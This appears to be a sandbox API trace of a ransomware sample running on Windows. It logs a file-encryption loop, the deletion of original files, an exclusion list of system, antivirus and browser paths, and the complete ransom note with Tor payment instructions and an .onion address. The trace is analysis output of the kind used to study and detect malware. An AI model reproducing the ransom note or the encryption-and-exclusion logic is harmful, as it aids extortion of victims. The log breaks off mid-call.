[0160.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.122] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.122] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.122] GetLastError () returned 0x0 [0160.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.122] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.122] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.122] GetLastError () returned 0x0 [0160.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.123] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.123] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.123] GetLastError () returned 0x0 [0160.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.123] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.123] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.123] GetLastError () returned 0x0 [0160.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.123] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.123] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.123] GetLastError () returned 0x0 [0160.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.123] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.123] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.123] GetLastError () returned 0x0 [0160.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.123] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.123] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.123] GetLastError () returned 0x0 [0160.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.123] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.123] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.123] GetLastError () returned 0x0 [0160.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.124] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.124] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.124] GetLastError () returned 0x0 [0160.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.124] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.124] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.124] GetLastError () returned 0x0 [0160.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.124] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.124] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.124] GetLastError () returned 0x0 [0160.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.124] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.124] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui")) returned 0x20 [0160.124] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.125] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui") returned 1 [0160.125] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui")) returned 0 [0160.125] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" [0160.125] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 1 [0160.125] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\.xXE4C5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\.xxe4c5.tmp")) returned 0xe4c5 [0160.126] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\.xXE4C5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\.xxe4c5.tmp"), dwFlags=0x1) returned 0 [0160.126] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\.xXE4C5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\.xxe4c5.tmp")) returned 1 [0160.126] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0160.126] wcslen (_String="OK") returned 0x2 [0160.126] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.126] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.126] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0160.126] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0160.126] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0160.126] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.126] GetLastError () returned 0x12 [0160.126] FindClose (in: hFindFile=0x9ad6b8 | out: hFindFile=0x9ad6b8) returned 1 [0160.126] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.127] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.127] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.127] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.127] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.127] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.128] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.128] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.128] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*.exe") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*.dll") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*.lnk") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*.bat") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*.ini") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*.msi") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*.scf") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*pagefile.sys*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*AppData*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\winrar\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\java\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\windows\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\ESET\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\AVG\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*Atheros*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*Realtek*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*bootmgr*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*boot*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*boot*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*IO.SYS*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*ntldr*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*chrome*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*opera*") returned 0 [0160.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", pszSpec="*firefox*") returned 0 [0160.128] wcslen (_String="\\\\?\\") returned 0x4 [0160.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad738 [0160.129] wcscmp (_String1=".", _String2=".") returned 0 [0160.129] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.129] wcscmp (_String1="..", _String2=".") returned 1 [0160.129] wcscmp (_String1="..", _String2="..") returned 0 [0160.129] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.129] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.130] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.130] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.130] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.130] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.130] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.130] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.130] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.130] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.130] strlen (_Str="NMoreira") returned 0x8 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 